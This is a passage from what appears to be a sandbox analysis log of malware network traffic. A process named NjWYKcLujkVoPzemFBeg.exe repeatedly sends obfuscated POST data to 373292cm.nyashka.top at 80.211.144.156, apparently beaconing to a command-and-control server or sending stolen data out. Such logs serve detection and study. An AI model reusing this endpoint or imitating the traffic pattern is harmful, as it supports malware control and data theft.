                              17192.168.2.55987380.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:43:45.083600998 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:45.437380075 CEST2504OUTData Raw: 5a 51 5c 54 54 42 54 51 5b 5f 5a 51 59 55 58 56 57 5e 5d 52 57 5b 53 5c 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZQ\TTBTQ[_ZQYUXVW^]RW[S\YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-,@#= 35[>(+!^?;]704!(9 5..&F$.Y/-
                              Aug 25, 2024 15:43:45.778043985 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:45.911480904 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:45 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              18192.168.2.55987480.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:43:46.044668913 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:46.397670031 CEST2504OUTData Raw: 5f 51 5c 57 54 47 51 5e 5b 5f 5a 51 59 5e 58 52 57 5e 5d 59 57 59 53 5d 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _Q\WTGQ^[_ZQY^XRW^]YWYS]YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-8;B5=#"35+- ?.)= ?0#1#*9"0>8>&F$.Y/
                              Aug 25, 2024 15:43:46.717950106 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:46.855016947 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:46 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              19192.168.2.55987580.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:43:46.981221914 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:47.337042093 CEST2504OUTData Raw: 5a 55 59 52 51 40 51 5b 5b 5f 5a 51 59 50 58 52 57 50 5d 58 57 5d 53 54 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZUYRQ@Q[[_ZQYPXRWP]XW]STYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-8 6?70![*Y(*?>8#<W#($4!X;>&F$.Y/
                              Aug 25, 2024 15:43:47.649580002 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:47.778722048 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:47 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              20192.168.2.55987680.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:43:47.902379036 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:48.259783030 CEST2504OUTData Raw: 5f 52 59 54 54 43 54 50 5b 5f 5a 51 59 54 58 5e 57 59 5d 59 57 5e 53 5b 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _RYTTCTP[_ZQYTX^WY]YW^S[YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_./0;#=7&>=(=(]40!1<<;43!Y;.&F$.Y/)


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              21192.168.2.55987780.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:43:48.560653925 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 1828
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:48.913254976 CEST1828OUTData Raw: 5a 51 59 50 54 41 51 5a 5b 5f 5a 51 59 56 58 51 57 5f 5d 53 57 58 53 5c 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZQYPTAQZ[_ZQYVXQW_]SWXS\YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-/;D"7#=Z*=X<=[+-;Z"?3 (*###>;.&F$.Y/!
                              Aug 25, 2024 15:43:49.246128082 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:49.357942104 CEST308INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:48 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 152
                              Connection: keep-alive
                              Data Raw: 09 1d 26 1f 29 25 2e 11 26 15 0e 19 24 1d 22 53 3d 3d 27 1d 29 3d 26 05 27 5e 3a 00 32 3e 2c 56 33 05 31 5a 3c 3e 0b 0f 26 3c 2c 01 3a 0e 2b 5d 0c 13 22 5e 23 39 39 04 26 3c 28 11 3e 38 37 5f 20 3f 21 02 2b 14 0f 55 2b 2f 02 5e 2b 3a 24 02 2b 39 2e 55 3b 06 2d 5d 2e 30 2e 54 22 3e 2b 52 0d 11 27 0c 28 13 04 0d 28 3d 23 5f 36 38 23 5f 30 13 2a 13 26 0b 3e 1e 33 07 01 02 32 21 2a 08 27 0f 39 51 32 38 35 06 31 3f 36 09 36 18 23 54 2c 00 22 57 01 33 55 56
                              Data Ascii: &)%.&$"S==')=&'^:2>,V31Z<>&<,:+]"^#99&<(>87_ ?!+U+/^+:$+9.U;-].0.T">+R'((=#_68#_0*&>32!*'9Q2851?66#T,"W3UV


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              22192.168.2.55987880.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:43:48.682627916 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2500
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:49.038275957 CEST2500OUTData Raw: 5a 50 59 53 54 49 54 5c 5b 5f 5a 51 59 57 58 54 57 5d 5d 5c 57 5c 53 59 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZPYSTIT\[_ZQYWXTW]]\W\SYYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_./'E5[;#V:=,_("(-<",' W/+);^7058&F$.Y/)
                              Aug 25, 2024 15:43:49.116322994 CEST1236OUTData Raw: 33 31 08 20 3b 56 16 26 3f 39 30 38 34 56 2f 33 39 09 17 0f 2a 35 21 1b 31 03 0a 54 0f 30 3d 33 37 3d 34 20 05 02 36 03 3f 06 2e 27 09 3f 11 20 3a 04 0c 3e 34 06 39 3b 32 3d 0e 3a 01 20 2b 1c 24 32 31 0d 3c 5f 39 2f 3c 04 0d 26 05 01 28 1b 0d 20
                              Data Ascii: 31 ;V&?9084V/39*5!1T0=37=4 6?.'? :>49;2=: +$21<_9/<&( 4\S( ?7663)*:1-&(S!;</-5.3 '"9_/!+V=+9-6V<.".?7<%3]40,?=?8%W982>*!#'<-!>2U:2_1#=+??U)=?#,"63>9=:730*;9*
                              Aug 25, 2024 15:43:49.376949072 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:49.586472034 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:48 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              23192.168.2.55987980.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:43:49.716254950 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:43:50.070076942 CEST2504OUTData Raw: 5a 55 59 55 51 40 54 5e 5b 5f 5a 51 59 51 58 50 57 5d 5d 5d 57 50 53 55 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZUYUQ@T^[_ZQYQXPW]]]WPSUYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.\;?D6=\7 ")4(>]+.( ?3R#!$W?;]7"8>&F$.Y/=
                              Aug 25, 2024 15:43:50.391168118 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:50.518053055 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:49 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              24192.168.2.55988080.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:43:50.655154943 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:51.007023096 CEST2504OUTData Raw: 5f 53 5c 55 54 45 54 5d 5b 5f 5a 51 59 50 58 56 57 5b 5d 5e 57 5e 53 58 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _S\UTET][_ZQYPXVW[]^W^SXYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-8/B!=4^#>++*<=?#(#<V('7>/.&F$.Y/
                              Aug 25, 2024 15:43:51.322968960 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:51.449501038 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:50 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              25192.168.2.55988180.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:43:51.573580980 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:51.929222107 CEST2504OUTData Raw: 5a 51 5c 53 54 46 51 5b 5b 5f 5a 51 59 53 58 5e 57 50 5d 59 57 5f 53 5b 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZQ\STFQ[[_ZQYSX^WP]YW_S[YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-/+6.?7#%>>4_<:+7]#, #;*:+" ,&F$.Y/5
                              Aug 25, 2024 15:43:52.248102903 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:52.383662939 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:51 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              26192.168.2.55988280.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:43:52.511118889 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:52.866420984 CEST2504OUTData Raw: 5f 57 59 55 54 41 51 5a 5b 5f 5a 51 59 5e 58 50 57 5a 5d 5f 57 5b 53 58 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _WYUTAQZ[_ZQY^XPWZ]_W[SXYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.;38!=##Z)(.?=4#<#?)$7 5Y..&F$.Y/
                              Aug 25, 2024 15:43:53.206073046 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:53.336045980 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:52 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              27192.168.2.55988380.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:43:53.898179054 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:54.257236958 CEST2504OUTData Raw: 5f 5d 59 52 54 44 51 59 5b 5f 5a 51 59 52 58 52 57 5b 5d 5b 57 5b 53 5e 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _]YRTDQY[_ZQYRXRW[][W[S^YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-/+!.$Y#0)=>/?>( <7$R*:?#>8&F$.Y/1


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              28192.168.2.55988480.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:43:54.379791021 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 1828
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:54.726849079 CEST1828OUTData Raw: 5f 5c 59 57 51 40 54 51 5b 5f 5a 51 59 50 58 5f 57 5c 5d 5f 57 50 53 5b 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _\YWQ@TQ[_ZQYPX_W\]_WPS[YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.X/3;68_" >)>4](9(['\4#?*90439_8>&F$.Y/
                              Aug 25, 2024 15:43:55.068360090 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:55.203455925 CEST308INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:54 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 152
                              Connection: keep-alive
                              Data Raw: 09 1d 25 0e 3d 1b 3e 12 32 02 3b 0c 25 33 3e 1d 2a 3d 3b 1d 3e 3e 32 05 27 16 2a 07 27 3e 05 0f 27 15 25 5a 28 3e 26 50 26 06 23 59 2d 1e 2b 5d 0c 13 21 05 37 14 3a 1e 31 3f 34 5a 29 38 0d 16 21 2c 07 03 28 5c 2d 1b 28 01 20 5e 2b 07 38 01 3f 29 3e 1f 38 5e 3e 04 2d 09 26 51 22 2e 2b 52 0d 11 24 1e 3f 3e 22 0e 29 3e 19 14 22 2b 3b 10 24 13 31 0d 25 0c 00 54 26 39 3c 5a 27 21 21 1c 25 21 3e 0c 25 5d 36 13 26 3f 00 08 35 08 23 54 2c 00 22 57 01 33 55 56
                              Data Ascii: %=>2;%3>*=;>>2'*'>'%Z(>&P&#Y-+]!7:1?4Z)8!,(\-( ^+8?)>8^>-&Q".+R$?>")>"+;$1%T&9<Z'!!%!>%]6&?5#T,"W3UV


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              29192.168.2.55988580.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:43:54.556386948 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:54.913705111 CEST2504OUTData Raw: 5a 57 5c 50 54 49 54 5c 5b 5f 5a 51 59 52 58 51 57 58 5d 53 57 51 53 5d 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZW\PTIT\[_ZQYRXQWX]SWQS]YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-/0,6= 9[*-(?!?=8 /772<+9;_#9\..&F$.Y/1
                              Aug 25, 2024 15:43:55.223344088 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:55.357815981 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:54 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              30192.168.2.55988680.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:43:55.481884003 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:43:55.836592913 CEST2504OUTData Raw: 5a 51 5c 54 54 46 51 5c 5b 5f 5a 51 59 53 58 57 57 59 5d 5b 57 5e 53 5c 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZQ\TTFQ\[_ZQYSXWWY][W^S\YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.^//#- 43*=#?)_). ?7#8V<9##58>&F$.Y/5
                              Aug 25, 2024 15:43:56.164293051 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:56.301558018 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:55 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
